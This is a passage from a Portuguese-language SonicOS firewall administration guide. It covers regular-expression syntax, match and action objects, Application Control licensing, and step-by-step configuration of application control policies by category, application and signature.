Sintaxe de expresses comuns

As tabelas a seguir mostram a sintaxe utilizada na criao de expresses comuns.
Tabela 1: Caracteres nicos

Representao Definio
. Qualquer caractere, exceto "\n". Use o modificador /s (modo de fluxo, tambm
conhecido como modo de linha nica) para tambm fazer corresponder "\n".
[xyz] Classe de caracteres. Tambm pode fornecer caracteres de escape. Os caracteres
especiais no precisam conter escape, pois eles no possuem um significado
especial dentro de parnteses [ ].

Tabela 1: Caracteres nicos
Representao Definio
[^xyz] Classe de caracteres negada.
\xdd Entrada hexadecimal. "dd" o valor hexadecimal do caractere. So obrigatrios
dois dgitos. Por exemplo, \r \x0d e no \xd.
[az][09] Intervalo de caracteres.
Tabela 2: Composies
Representao Definio
xy x seguido de y
x|y x ou y
(x) Equivalente a x. Pode ser usada para substituir precedncias.
Tabela 3: Repeties
Representao Definio
x* Zero ou mais x
x? Zero ou um x
x+ Um ou mais x
x{n, m} Mnimo de n e mximo de x sequencial de m. Todas as repeties numeradas so
expandidas. Portanto, tornar m exageradamente grande insensato.
x{n} Exatamente x de n
x{n,} Mnimo de x de n
x{,n} Mximo de x de n
Tabela 4: Sequncias de escape

Representao Definio
\0, \a, \b, \ Sequncias de escape de linguagem de programao "C" (\0 o caractere NULO
f, \t, \n, \r, [caractere zero ASCII])
\v
\x Entrada hexadecimal. \x seguido de dois dgitos hexadecimais indica o
valor hexadecimal do caractere desejado.
\*, \?, \+, $, $, \[, Escapar qualquer caractere especial.
\], \{, \}, \\, \/,
Nota: Comentrios que no so processados so precedidos por
\<space>, \#
qualquer nmero de espaos e um smbolo de cerquilha (#). Ento, para
fazer corresponder um espao ou um smbolo de cerquilha (#), voc
deve usar as sequncias de escape \ e \#.
Tabela 5: Classes de caracteres semelhantes a Perl

Representao Definio
\d, \D Dgitos, no dgitos.
\z, \Z Dgitos diferentes de zero ([1-9]), todos os outros caracteres.
\s, \S Espao em branco, espao no em branco. Equivalente a [\t\n\f\r]. \v no
est includo em espaos em branco de Perl.
\w, \W Caracteres de palavra, caracteres no de palavra equivalentes a [0-9A-Za-z_].

Tabela 6: Outros primitivos de classe de caracteres ASCII
Se voc
precisar... ... ento use
[:cntrl:] \c, \C Caractere de controle. [\x00 - \x1F\x7F]
[:digit:] \d, \D Dgitos, no dgitos. O mesmo que a classe de caracteres Perl.
[:graph:] \g, \G Qualquer caractere imprimvel, exceto espao.
[:xdigit:] \h, \H Qualquer dgito hexadecimal. [a-fA-F0-9]. Observe que isto
diferente do \h do Perl, o que significa um espao horizontal.
[:lower:] \l, \L Qualquer caractere minsculo.
[:ascii:] \p, \P Caracteres ASCII positivos e negativos. [0x00 0x7F], [0x80
0xFF]
[:upper:] \u, \U Qualquer caractere maisculo.
Algumas das outras classes de caracteres populares podem ser criadas a partir dos primitivos
acima. As classes a seguir no tm suas prprias abreviaes devido falta de um bom
mnemnico para qualquer um dos outros caracteres usados para elas.
Tabela 7: Classes de caracteres compostos

Se voc
precisar... ... ento use
[:alnum:] = [\l\u\d] O conjunto de todos os caracteres e dgitos.
[:alpha:] = [\l\u] O conjunto de todos os caracteres.
[:blank:] = [\t<space>] A classe de caracteres em branco: tabulao e espaos.
[:print:] = [\g<space>] A classe de todos os caracteres imprimveis: todos os
caracteres grficos, incluindo espaos.
[:punct:] = [^\P\c<space>\d\ A classe de todos os caracteres de pontuao: nenhum
u\l] caractere ASCII negativo, nenhum caractere de controle,
nenhum espao, nenhum dgito, nenhum caractere
maisculo ou minsculo.
[:space:] = [\s\v] Todos os caracteres de espao em branco. Inclui o
espao em branco e o caractere de guia vertical Perl.
Tabela 8: Modificadores
Representao Definio
/i No sensveis a maisculas e minsculas
/s Trata a entrada como linha nica. Tambm podem ser considerados modo de
fluxo. Isto , "." corresponde tambm a "\n".
Tabela 9: Operadores em ordem decrescente de precedncia

Operadores Capacidade de associao
[ ], [^] Da esquerda para a direita
() Da esquerda para a direita
*, +, ? Da esquerda para a direita
. (Concatenao) Da esquerda para a direita
| Da esquerda para a direita

Comentrios
O SonicOS suporta comentrios em expresses regulares. Os comentrios so precedidos por
qualquer nmero de espaos e um smbolo de cerquilha (#). Todo texto aps um espao e o
sinal de cerquilha removido at o fim da expresso.
Correspondncia negativa
A correspondncia negativa fornece uma forma alternativa de especificar que contedo deve
ser bloqueado. possvel habilitar a correspondncia negativa em um objeto de
correspondncia quando desejar bloquear tudo exceto um tipo de contedo em particular. Ao
usar o objeto em uma poltica, a poltica executar aes baseadas na ausncia do contedo
especificado no objeto de correspondncia. As vrias entradas de lista em um objeto de
correspondncia negativa so combinadas usando o E lgico, significando que a ao de
poltica executada somente quando todas as entradas de correspondncia negativa
especificadas so combinadas.
Embora todas as polticas de Regras de aplicativos sejam polticas de NEGAO, possvel
simular uma poltica de PERMISSO usando a correspondncia negativa. Por exemplo,
possvel permitir anexos de e-mail .txt e bloquear anexos de todos os outros tipos de arquivo.
tambm possvel permitir alguns tipos e bloquear todos os outros.
Nem todos os tipos de objeto de correspondncia podem usar correspondncia negativa. Para
aqueles que podem, ser exibida a caixa de seleo Habilitar correspondncia negativa na
tela Configuraes do objeto de correspondncia.

Objetos da lista de aplicativos
A pgina Firewall > Objetos de correspondncia tambm contm o boto Adicionar objeto
da lista de aplicativos, o qual que abre a tela Criar objeto de correspondncia. Esta tela
contm duas guias:
Aplicativo voc pode criar um objeto de filtro de aplicativo nessa guia. Esta tela permite
a seleo da categoria do aplicativo, do nvel de ameaa, do tipo de tecnologia e dos
atributos. Aps realizadas as selees, exibida a lista de aplicativos que corresponde a
esses critrios. A guia Aplicativo fornece outra forma de criar um objeto de
correspondncia do tipo de lista de aplicativos.
Categoria voc pode criar um objeto de filtro de categoria nessa guia. fornecida uma
lista de categorias de aplicativo e suas descries. A pgina Categoria oferece outra forma
para criar um objeto de correspondncia do tipo de lista de categorias de aplicativo.
Filtros de aplicativos
A guia Aplicativo fornece uma lista de aplicativos para seleo. Voc pode controlar quais
aplicativos so mostrados selecionando uma ou mais categorias de aplicativos, nveis de
ameaa e tecnologias. Voc tambm pode pesquisar uma palavra-chave em todos os nomes
de aplicativos digitando-a no campo Pesquisar, junto do canto superior direito da tela. Por
exemplo, digite "bittorrent" no campo Pesquisar e clique no cone Pesquisar para encontrar
vrios aplicativos com "bittorrent" (no diferenciam maisculas de minsculas) no nome.
Quando a lista de aplicativos reduzida para uma lista que se concentra em suas preferncias,
voc pode selecionar os aplicativos individuais para seu filtro clicando no cone de Mais junto
deles e depois salvando suas selees como um objeto de filtro de aplicativo com um nome
personalizado ou um nome gerado automaticamente. A imagem abaixo mostra a tela com
todas as categorias, todos os nveis de ameaa e todas as tecnologias selecionadas, mas
antes de quaisquer aplicativos individuais terem sido escolhidos.

medida que voc seleciona os aplicativos para o seu filtro, eles aparecem no campo Grupo
de aplicativos direita. Voc pode editar a lista neste campo excluindo itens individuais ou
clicando na borracha para excluir todos os itens. A imagem abaixo mostra vrios aplicativos no
campo Grupo de aplicativos. Os aplicativos selecionados so tambm marcados com um
cone de marca de seleo verde na lista de aplicativos no lado esquerdo.
Quando terminar a seleo dos aplicativos a incluir, voc pode digitar um nome para o objeto
no campo Nome do objeto de correspondncia (primeiro desmarque a caixa de seleo
Gerar nome do objeto de correspondncia automaticamente) e clicar no boto Salvar
objeto de correspondncia de aplicativo. Voc ver o nome do objeto listado na pgina
Firewall > Objetos de correspondncia com um tipo de objeto da Lista de aplicativos. Este
objeto pode ser selecionado ao criar uma poltica de regras de aplicativos.
Os objetos de correspondncia criados usando a opo Gerar nome do objeto de
correspondncia automaticamente exibem um til (~) como primeiro caractere do nome do
objeto.
Filtros de categoria
A guia Categoria fornece uma lista de categorias de aplicativos para seleo. Voc pode
selecionar qualquer combinao de categorias e, em seguida, salvar as selees como um
objeto de filtro de categoria com um nome personalizado. A imagem abaixo mostra a tela com
a descrio da categoria de mensagens instantneas exibida.

Voc pode passar o ponteiro do mouse sobre cada categoria na lista para ver a respectiva
descrio. Para criar um objeto de filtro de categoria personalizada, basta digitar um nome
para o objeto no campo Nome do objeto de correspondncia (primeiro desmarque a caixa
de seleo Gerar nome do objeto de correspondncia automaticamente), selecionar uma
ou mais categorias e clicar no boto Salvar objeto de correspondncia de categoria. Voc
ver o nome do objeto listado na pgina Firewall > Objetos de correspondncia com um tipo
de objeto de Lista de categorias de aplicativo. Este objeto pode ser selecionado ao criar uma
poltica de regras de aplicativos.
Os objetos de correspondncia criados usando a opo Gerar nome do objeto de
correspondncia automaticamente exibem um til (~) como primeiro caractere do nome do
objeto.
Objetos de ao
Os objetos de ao definem como a poltica de regras de aplicativo reage a eventos de

correspondncia. Voc pode escolher uma ao que pode ser personalizada ou selecionar
uma das aes padro predefinidas.
As aes predefinidas so exibidas na pgina Configuraes de poltica de controle de
aplicativos quando voc adicionar ou editar uma poltica na pgina Regras de aplicativos.
gerenciamento de largura de banda na pgina Configuraes de firewall > BWM. Se o
Tipo de gerenciamento de largura de banda estiver configurado para Global, as oito
prioridades so selecionveis. Se o Tipo de gerenciamento de largura de banda estiver
configurado para Avanado, nenhuma prioridade selecionvel, mas as prioridades
predefinidas esto disponveis ao adicionar uma poltica.
A tabela seguinte mostra as aes padro predefinidas que esto disponveis ao adicionar uma
poltica.
Sempre disponvel Se tipo de BWM = Global Se tipo de BWM = Avanado

Redefinir/descartar BWM Global em tempo real BWM avanado baixo
Nenhuma ao BWM Global mais alto BWM avanado mdio
Ignorar DPI BWM Global alto BWM avanado alto
Monitor de pacotes BWM Global mdio/alto
BWM Global mdio
BWM Global mdio/baixo
BWM Global baixo
BWM Global mais baixo
Para obter mais informaes sobre as aes de BWM, consulte Aes usando o
As seguintes aes personalizveis so exibidas na janela Adicionar/editar objeto de ao
quando voc clica em Adicionar novo objeto de ao na pgina Firewall > Objetos de ao:
Bloquear e-mail de SMTP Enviar resposta de erro
Desabilitar anexo de e-mail Adicionar texto
E-mail Adicionar texto
Responder a notificao FTP
Bloquear pgina HTTP
Redirecionar HTTP
Consulte a tabela abaixo para obter descries sobre esses tipos de ao.

Note que as aes personalizveis esto disponveis para edio na janela Configuraes do
objeto da ao mostrada na imagem abaixo. As aes predefinidas no podem ser editadas
ou excludas. Quando voc cria uma poltica, a tela Configuraes de polticas permite realizar
uma seleo a partir das aes predefinidas, juntamente com quaisquer aes personalizadas
que voc definiu.
A tabela a seguir descreve os tipos de ao disponveis.
Predefinida ou
Tipo de ao Descrio personalizada
BWM Global em tempo real Gerencia largura de banda de entrada e sada, pode ser Predefinida
configurada para largura de banda garantida em diferentes
quantidades e uso de largura de banda mximo/estouro para
at 100% do total de largura de banda disponvel e define
uma prioridade de zero.
BWM Global mais alto Gerencia largura de banda de entrada e sada, pode ser Predefinida
uma prioridade de um.
BWM Global alto Gerencia largura de banda de entrada e sada, pode ser Predefinida
quantidades (o padro de 30%) e uso de largura de banda
mximo/estouro para at 100% do total de largura de banda
disponvel e define uma prioridade de dois.
BWM Global mdio/alto Gerencia largura de banda de entrada e sada, pode ser Predefinida
uma prioridade de trs.
BWM Global mdio Gerencia largura de banda de entrada e sada, pode ser Predefinida
disponvel e define uma prioridade de quatro.
BWM Global mdio/baixo Gerencia largura de banda de entrada e sada, pode ser Predefinida
uma prioridade de cinco.

Predefinida ou
Tipo de ao Descrio personalizada
BWM Global baixo Gerencia largura de banda de entrada e sada, pode ser Predefinida
disponvel e define uma prioridade de seis.
BWM Global mais baixo Gerencia largura de banda de entrada e sada, pode ser Predefinida
uma prioridade de sete.
Ignorar DPI Desvia IPS, GAV, Anti-spyware e Controle de aplicativos de Predefinida
componentes de inspeo profunda de pacotes. Esta ao
persiste por toda a durao da conexo assim que for
acionada. O tratamento especial aplicado a canais de
controle de FTP que nunca so ignorados para inspeo do
Controle de aplicativos. Esta ao suporta tratamento
adequado do canal de dados FTP. Observe que a opo
Ignorar DPI no para filtros que esto habilitados na pgina
Configuraes de firewall > Controle de SSL.
Nenhuma ao As polticas podem ser especificadas sem qualquer ao. Predefinida
Isso permite tipos de poltica de "somente log".
Monitor de pacotes Use o recurso de monitor de pacotes do SonicOS para Predefinida
capturar pacotes de entrada e sada na sesso ou, se o
espelhamento estiver configurado, para copiar os pacotes
para outra interface. A captura pode ser visualizada e
analisada com o Wireshark.
Redefinir/descartar Para TCP, a conexo ser redefinida. Para UDP, o pacote Predefinida
ser descartado.
Bloquear e-mail de SMTP Bloqueia e-mail de SMTP e notifica o remetente com uma Personalizado
Enviar resposta de erro mensagem de erro personalizada.
Desabilitar anexo de e-mail Desabilita o anexo dentro de um e-mail e adiciona texto Personalizado
Adicionar texto personalizado.
E-mail Adicionar texto Adiciona texto personalizado no final do e-mail. Personalizado
Responder a notificao Envia texto de novo para o cliente atravs do canal de Personalizado
FTP controle de FTP sem encerrar a conexo.
Bloquear pgina HTTP Permite uma configurao de bloqueio de pgina HTTP Personalizado
personalizada com uma opo de cores.
Redirecionar HTTP Oferece a funcionalidade de redirecionamento de HTTP. Por Personalizado
exemplo, se algum desejasse redirecionar pessoas para o
site da Web Google, a parte que pode ser personalizada
seria: http://www.google.com
Se um redirecionamento de HTTP for enviado do controle de
aplicativos para um navegador que tem um formulrio aberto,
as informaes no formulrio sero perdidas.
Gerenciamento de largura Permite a definio das restries do gerenciamento de Personalizado
de banda largura de banda com a mesma semntica da definio de
poltica de BWM da regra de acesso.
Uma configurao de prioridade de zero a prioridade mais alta. A largura de banda garantida
para todos os nveis de BWM combinado no deve exceder 100%.

Objetos de endereo de e-mail
O Controle de aplicativos permite a criao de listas personalizadas de endereos de e-mail

como objetos de endereo de e-mail. Voc s pode usar objetos de endereo de e-mail em
uma configurao de poltica de cliente SMTP. Os objetos de endereo de e-mail podem
representar usurios individuais ou todo o domnio. Voc tambm pode criar um objeto de
endereo de e-mail que representa um grupo adicionando uma lista de endereos individuais
ao objeto. Isto permite incluir ou excluir facilmente um grupo de usurios ao criar uma poltica
de cliente SMTP.
Por exemplo, voc pode criar um objeto de endereo de e-mail para representar o grupo de
suporte:
Depois de definir o grupo no objeto do endereo de e-mail, voc pode criar uma poltica de
cliente SMTP que inclui ou exclui o grupo.

Na imagem abaixo, as configuraes excluem o grupo de suporte de uma poltica que impede
que arquivos executveis sejam anexados a e-mails enviados. Voc pode usar o objeto de
endereo de e-mail nos campos E-MAIL DE ou RECEB PARA da poltica de cliente SMTP. O
campo E-MAIL DE refere-se ao remetente do e-mail. O campo RECEB PARA refere-se ao
destinatrio pretendido.
Embora o Controle de aplicativos no consiga extrair os membros do grupo diretamente do

Outlook Exchange ou de aplicativos semelhantes, voc pode usar as listas de membros no
Outlook para criar um arquivo de texto que apresenta os membros do grupo. Quando voc criar
um objeto de endereo de e-mail para esse grupo, voc pode ento usar o boto Carregar a
partir de arquivo para importar a lista do seu arquivo de texto. Certifique-se de que cada
endereo de e-mail se encontra isolado em uma linha no arquivo de texto.
Licenciar o Controle de aplicativos

O controle de aplicativos e Application Intelligence possuem dois componentes:
O componente Intelligence est licenciado como Visualizao de aplicativos e oferece
relatrios e identificao de trfego de aplicativos nas pginas Painel > Monitor em
tempo real e Monitor de AppFlow.
O componente de controle est licenciado como Controle de aplicativos e permite criar
e impor polticas personalizadas de Controle de aplicativos e Regras de aplicativos para
registro, bloqueio e gerenciamento de largura de banda do trfego de aplicativo gerenciado
por sua rede.
A visualizao de aplicativos e o controle de aplicativos esto licenciados em um pacote com
outros servios de segurana, incluindo Antivrus do gateway (GAV), Anti-spyware e Servio
de preveno contra intruses (IPS) da SonicWALL.

Nota Aps o registro no MySonicWALL ou quando voc carregar o SonicOS em um dispositivo
SonicWALL registrado, os dispositivos SonicWALL suportados iniciam uma licena de
avaliao de 30 dias automtica para visualizao de aplicativos e controle de aplicativos
e as assinaturas do aplicativo so baixadas.
Uma verso de avaliao gratuita de 30 dias tambm est disponvel para os outros servios
de segurana no pacote, mas no automaticamente habilitada tal como acontece com a
visualizao de aplicativos e o controle de aplicativos. Voc pode iniciar as verses de
avaliao gratuitas adicionais nas pginas individuais de Servios de segurana no SonicOS
ou no MySonicWALL.
Assim que o recurso Visualizao de aplicativos for habilitado manualmente na pgina Log >
Relatrios de fluxo (consulte a figura abaixo), voc pode ver em tempo real o trfego de
aplicativos na pgina Painel > Monitor em tempo real e a atividade de aplicativos em outras
pginas do Painel relativamente a fluxos identificados/classificados do banco de dados de
assinatura do aplicativo do firewall.

Para comear a usar o controle de aplicativos, voc deve habilit-lo na pgina Firewall >
Controle de aplicativos avanado. Veja a figura abaixo.
Para criar polticas usando regras de aplicativos (includas com a licena de controle de
aplicativos), selecione Habilitar regras de aplicativos na pgina Firewall > Regras de
aplicativos. Veja a figura abaixo.
O servidor de licenas da Dell SonicWALL fornece as chaves de licena da Visualizao de

aplicativos e do Controle de aplicativos para o firewall quando voc iniciar uma verso de
avaliao de 30 dias (aps o registro) ou adquirir um conjunto de licenas de servios de
segurana.
As licenas esto disponveis em www.mysonicwall.com na pgina Gerenciamento de servios
Produtos associados, em SERVIOS DE GATEWAY.
O conjunto de licenas de servios de segurana inclui licenas para os seguintes servios de
assinatura:
Visualizao de aplicativos
Antivrus do gateway
Anti-spyware no gateway
Servio de preveno contra intruses

As atualizaes de assinatura de aplicativo e assinatura de outros servios de segurana so
periodicamente baixadas para o firewall se estes servios estiverem licenciados.
Nota Se voc desabilitar a visualizao na interface de gerenciamento do SonicOS, as

atualizaes de assinatura de aplicativo so interrompidas at que o recurso seja habilitado
novamente.
Quando a alta disponibilidade estiver configurada entre dois firewalls, os firewalls podem
compartilhar a licena de servios de segurana. Para usar este recurso, voc deve registrar
os firewalls em MySonicWALL como produtos associados. Ambos os dispositivos devem ser
do mesmo modelo de dispositivo de segurana de rede Dell SonicWALL.
Nota Para um par de alta disponibilidade, mesmo tendo registrado anteriormente seus
dispositivos em MySonicWALL, voc deve registrar individualmente os dispositivos
principal e secundrio a partir da interface de gerenciamento do SonicOS enquanto estiver
conectado ao endereo IP de gerenciamento individual de cada dispositivo. Isso permite
que a unidade secundria realize a sincronizao com o servidor de licena de firewall e
compartilhe licenas com o dispositivo principal associado. Se o acesso Internet for
restringido, voc poder aplicar manualmente as licenas compartilhadas para ambos os
dispositivos.
Firewall > Controle de aplicativos avanado

A pgina Firewall > Controle de aplicativos avanado permite configurar polticas de controle
de aplicativos globais usando categorias, aplicativos e assinaturas. As polticas configuradas
nesta pgina so independentes das polticas de regras de aplicativos e no precisam ser
adicionadas a uma poltica de regras de aplicativos para produzirem efeito.
possvel definir as seguintes configuraes nesta pgina:
Selecionar uma categoria, um aplicativo ou uma assinatura.
Selecionar o bloqueio, registro ou ambas as opes como a ao.
Especificar usurios, grupos ou intervalos de endereos IP para incluir ou excluir da ao.
Definir um cronograma para impor os controles.
Enquanto estas configuraes do controle de aplicativos so independentes das polticas de
regras de aplicativos, voc tambm pode criar objetos de correspondncia de aplicativos para
qualquer categoria, aplicativo ou assinatura disponvel aqui e usar esses objetos de
correspondncia em uma poltica de regras de aplicativos. Para obter mais informaes,
consulte Objetos da lista de aplicativos na pgina 600.
Definir configuraes globais do controle de aplicativos

A pgina Firewall > Controle de aplicativos avanado fornece as seguintes configuraes
globais:
Habilitar o controle de aplicativos
Definir as configuraes do controle de aplicativos
Redefinir polticas e configuraes do controle de aplicativos

O controle de aplicativos um servio licenciado e voc tambm deve habilit-lo para ativar o
recurso.
Para habilitar o controle de aplicativos e definir as configuraes globais:
Etapa 1 Para habilitar o controle de aplicativos globalmente, marque a caixa de seleo Habilitar
controle de aplicativos.
Etapa 2 Para habilitar o controle de aplicativos em uma zona de rede, navegue at a pgina Rede >
Zonas e clique no cone Configurar da zona desejada.
Etapa 3 Marque a caixa de seleo Habilitar o servio de controle de aplicativos e, em seguida,

clique em OK.
Nota As polticas de controle de aplicativos so aplicadas ao trfego de uma zona de rede

somente se voc habilitar o servio de controle de aplicativos para essa zona. As polticas
de regras de aplicativos so independentes e no so afetadas pela configurao do
controle de aplicativos de zonas de rede.

A pgina Rede > Zonas exibe um indicador verde na coluna Controle de aplicativos para
qualquer zona que tenha o servio de controle de aplicativos habilitado.
Etapa 4 Voc pode configurar uma lista de excluso global para polticas do controle de aplicativos na
pgina Firewall > Controle de aplicativos avanado. Para configurar a lista de excluso, clique
no boto Definir as configuraes do controle de aplicativos. A janela Lista de excluso do
controle de aplicativos ser aberta.
Etapa 5 Para usar a lista de excluso de IPS que pode ser configurada na pgina Servios de
segurana > Preveno de intruso, selecione o boto de opo Usar lista de excluso de
IPS.
Etapa 6 Para usar um objeto de endereo para a lista de excluso, selecione o boto de opo Usar
objeto de endereo de excluso do Controle de aplicativos e, em seguida, selecione um
objeto de endereo na lista suspensa.

Etapa 8 Para redefinir as configuraes do controle de aplicativos e a configurao da poltica para os
valores padro de fbrica, clique em Redefinir configuraes e polticas do controle de
aplicativos na pgina Firewall > Controle de aplicativos avanado e, em seguida, clique em
OK na caixa de dilogo de confirmao.
Configurar o Controle de aplicativos por categoria
A configurao baseada em categoria o mtodo mais amplamente baseado de configurao

de polticas na pgina Firewall > Controle de aplicativos avanado. A lista de categorias est
disponvel na lista suspensa Categoria.

Para configurar uma poltica de controle de aplicativos para uma categoria de aplicativo:
Etapa 1 Navegue at a pgina Firewall > Controle de aplicativos avanado.

Etapa 2 Em Controle de aplicativos avanado, selecione uma categoria de aplicativo a partir da lista
suspensa Categoria. exibido o boto Configurar direita do campo assim que uma categoria
selecionada.
Etapa 3 Clique no boto Configurar para abrir a janela Configuraes de categoria de controle de
aplicativos da categoria selecionada.
Etapa 4 Para bloquear aplicativos nesta categoria, selecione Habilitar na lista suspensa Bloquear.
Etapa 5 Para criar uma entrada de log quando os aplicativos nessa categoria forem detectados,
selecione Habilitar na lista suspensa Log.
Etapa 6 Para direcionar as aes selecionadas de bloqueio ou log para um usurio ou grupo de
usurios especfico, selecione um grupo de usurios ou um usurio individual na lista
suspensa Usurios/grupos includos. Selecione Todos para aplicar a poltica a todos os
usurios.
Etapa 7 Para excluir um usurio ou grupo de usurios especfico das aes selecionadas de bloqueio
ou log, selecione um grupo de usurios ou um usurio individual na lista suspensa Usurios/
grupos excludos. Selecione Nenhum para aplicar a poltica a todos os usurios.
Etapa 8 Para direcionar as aes selecionadas de bloqueio ou log para um endereo IP ou um intervalo
de endereos especfico, selecione um grupo de endereos ou um objeto de endereo na lista
suspensa Intervalo de endereos IP includo. Selecione Todos para aplicar a poltica a todos
os endereos IP.
Etapa 9 Para excluir um endereo IP ou um intervalo de endereos especfico das aes selecionadas
de bloqueio ou log, selecione um grupo de endereos ou um objeto de endereo na lista
suspensa Intervalo de endereos IP excludo. Selecione Nenhum para aplicar a poltica a
todos os endereos IP.
Etapa 10 Para habilitar esta poltica durante dias da semana e horas do dia especficos, selecione um
dos seguintes cronogramas na lista suspensa Cronograma:
Sempre ativo Habilitar a poltica em todos os momentos.
Horrio de trabalho Habilitar a poltica de segunda a sexta-feira, das 8h00 s 17h00.

S-T-Q-Q-S 08:00 s 17:00 Habilitar a poltica de segunda a sexta-feira, das 8h00 s
17h00.
Depois do horrio Habilitar a poltica de segunda a sexta-feira, das 17h00 s 8h00.
8h00.
S-T-Q-Q-S 17:00 s 24:00 Habilitar a poltica de segunda a sexta-feira, das 17h00
s 0h00.
D-S 00:00 s 24:00 Habilitar sempre a poltica (de segunda a sbado, 24 horas por
dia).
Horas do fim de semana Habilitar a poltica de sexta-feira s 17h00 a segunda-feira
s 8h00.
Etapa 11 Para especificar um atraso entre entradas de log de eventos repetitivos, digite o nmero de
segundos do atraso no campo Filtro de redundncia de log.
Configurar o Controle de aplicativos por aplicativo
A configurao baseada em aplicativo o nvel central da configurao de polticas na pgina

Firewall > Controle de aplicativos avanado, entre os nveis baseados em categoria e
assinatura.
Este mtodo de configurao permite que voc crie regras de polticas especficas para um
aplicativo nico se voc desejar impor as configuraes de poltica somente nas assinaturas
desse aplicativo sem afetar outros aplicativos na mesma categoria.
Para configurar uma poltica de controle de aplicativos para um aplicativo especfico:

Etapa 2 Em Controle de aplicativos avanado, selecione primeiro uma categoria na lista suspensa
Categoria.
Etapa 3 Em seguida, selecione um aplicativo nesta categoria a partir da lista suspensa Aplicativo.
exibido um boto de Configurar direita do campo assim que um aplicativo for selecionado.
Etapa 4 Clique no boto Configurar para abrir a janela Configuraes do aplicativo de controle de
aplicativos do aplicativo selecionado. Os campos no topo da janela existem no podem ser
editados. Esses campos mostram os valores de Categoria do aplicativo e Nome do aplicativo.
Os parmetros de configurao do aplicativo possuem as configuraes padro atuais da
categoria qual pertence o aplicativo. Para manter esta conexo com as configuraes da
categoria para um ou mais campos, deixe esta seleo inalterada para esses campos.
Etapa 5 Para bloquear este aplicativo, selecione Habilitar na lista suspensa Bloquear.
Etapa 6 Para criar uma entrada de log quando este aplicativo for detectado, selecione Habilitar na lista
suspensa Log.
usurios.
e log, selecione um grupo de usurios ou usurio na lista suspensa Usurios/grupos
excludos. Selecione Nenhum para aplicar a poltica a todos os usurios.

os endereos IP.
17h00.
8h00.
s 0h00.
dia).
s 8h00.
Etapa 13 Para obter informaes detalhadas sobre o aplicativo, clique aqui na Nota, no fundo da janela.
Configurar o Controle de aplicativos por assinatura
A configurao baseada em assinatura o nvel mais baixo e mais especfico de configurao

de polticas na pgina Firewall > Controle de aplicativos avanado.
Configurar uma poltica com base em uma assinatura especfica permite definir configuraes
de poltica para cada assinatura sem influenciar outras assinaturas do mesmo aplicativo.
Para configurar uma poltica de controle de aplicativos para uma assinatura especfica:

Etapa 2 Em Controle de aplicativos avanado, selecione primeiro uma categoria na lista suspensa
Categoria.
Etapa 3 Em seguida, selecione um aplicativo nesta categoria a partir da lista suspensa Aplicativo.
Etapa 4 Para exibir as assinaturas especficas para esse aplicativo, selecione Assinatura na lista
suspensa Visualizao por. O aplicativo de um jogo de estilo livre tem duas assinaturas.
Etapa 5 Clique no boto Configurar na linha da assinatura com a qual deseja trabalhar. A janela
Configuraes de assinatura de controle de aplicativos ser aberta. Os campos no topo da
janela existem no podem ser editados. Esses campos mostram os valores Categoria de
assinatura, Nome da assinatura, ID da assinatura, Prioridade e Direo do trfego no qual esta
assinatura possa ser detectada.
As configuraes padro de polticas da assinatura so definidas para as configuraes atuais
do aplicativo ao qual a assinatura pertence. Para manter esta conexo com as configuraes
de aplicativo para um ou mais campos, deixe esta seleo inalterada para esses campos.

Etapa 6 Para bloquear esta assinatura, selecione Habilitar na lista suspensa Bloquear.
Etapa 7 Para criar uma entrada de log quando esta assinatura for detectada, selecione Habilitar na
lista suspensa Log.
usurios.
ou log, selecione um grupo de usurios ou um usurio individual na lista suspensa Usurios/
grupos excludos. Selecione Nenhum para aplicar a poltica a todos os usurios.
os endereos IP.
17h00.
8h00.
s 0h00.
dia).
s 8h00.
Etapa 14 Para consultar informaes detalhadas sobre a assinatura, clique aqui na Nota, no fundo da
janela.

Firewall > Regras de acesso
Voc deve habilitar o Controle de aplicativos para que possa us-lo. O controle de aplicativos
e as regras de aplicativos so habilitados com as configuraes globais e o controle de
aplicativos tambm deve ser habilitado em cada zona de rede que voc deseja controlar.
Voc pode configurar polticas de controle de aplicativos a partir da pgina Painel > Monitor de
AppFlow selecionando um ou mais aplicativos ou categorias e, em seguida, clicando no boto
Criar regra. Uma poltica criada automaticamente na pgina Firewall > Regras de aplicativos
e pode ser editada assim como qualquer outra poltica.
Voc pode configurar as polticas de registro e bloqueio globais do Controle de aplicativos para
categorias de aplicativos, assinaturas ou aplicativos especficos na pgina Firewall > Controle
de aplicativos avanado. Os objetos de correspondncia so criados. Voc tambm pode
configurar objetos de correspondncia para essas categorias de aplicativos, assinaturas ou
aplicativos especficos na pgina Firewall > Objetos de correspondncia. Os objetos podem
ser usados em uma poltica de regras de aplicativo, independentemente da forma como eles
foram criados.
Voc pode configurar polticas em regras de aplicativo usando o assistente ou manualmente
na pgina Firewall > Regras de aplicativos. O assistente fornece um mtodo seguro de
configurao e ajuda a impedir erros que possam resultar em bloqueio de trfego de rede
desnecessrio. A configurao manual oferece mais flexibilidade para situaes que exigem
aes ou polticas personalizadas.
A pgina Firewall > Regras de aplicativos contm duas configuraes globais:
Habilitar regras de aplicativos
Filtro de redundncia de log global
Voc deve habilitar as regras de aplicativos para ativar o recurso. As regras de aplicativos
esto licenciadas como parte do controle de aplicativos, o qual est licenciado em
www.mysonicwall.com na pgina Gerenciamento de servios Produtos associados, em
SERVIOS DE GATEWAY. Voc pode visualizar o status de sua licena na parte superior da
pgina Firewall > Regras de aplicativos, como mostrado abaixo.
Para habilitar regras de aplicativos e definir as configuraes globais:
Etapa 1 Para habilitar regras de aplicativos, marque a caixa de seleo Habilitar regras de
aplicativos.
Etapa 2 Para registrar todas as correspondncias de polticas, deixe o campo Filtro de redundncia
de log global definido para zero. Para impor um atraso entre entradas de log para
correspondncias da mesma poltica, digite o nmero de segundos de atraso.

As configuraes de redundncia de log global se aplicam a todas as polticas de regras de
aplicativos. Se definidas para zero, criada uma entrada de log para cada correspondncia de
poltica detectada no trfego. Outros valores especificam o nmero mnimo de segundos entre
entradas de log para vrias correspondncias da mesma poltica. Por exemplo, a configurao
de uma redundncia de log de 10 registrar no mais do que uma mensagem a cada 10
segundos para cada correspondncia de poltica. A redundncia de log tambm pode ser
configurada por poltica na pgina Adicionar/editar poltica onde a configurao de cada
poltica tem sua prpria configurao do filtro de redundncia de log que pode substituir a
configurao do filtro de redundncia de log.
Para obter informaes sobre como configurar Regras de aplicativos, consulte as seguintes
sees:
Configurar uma poltica de regras de aplicativos na pgina 620
Usar o assistente de Controle de aplicativos na pgina 624
Firewall > Objetos de correspondncia na pgina 627
Configurar objetos da lista de aplicativos na pgina 630
Firewall > Objetos de ao na pgina 631
Firewall > Objetos de endereos na pgina 632
Firewall > Objetos de servios na pgina 632
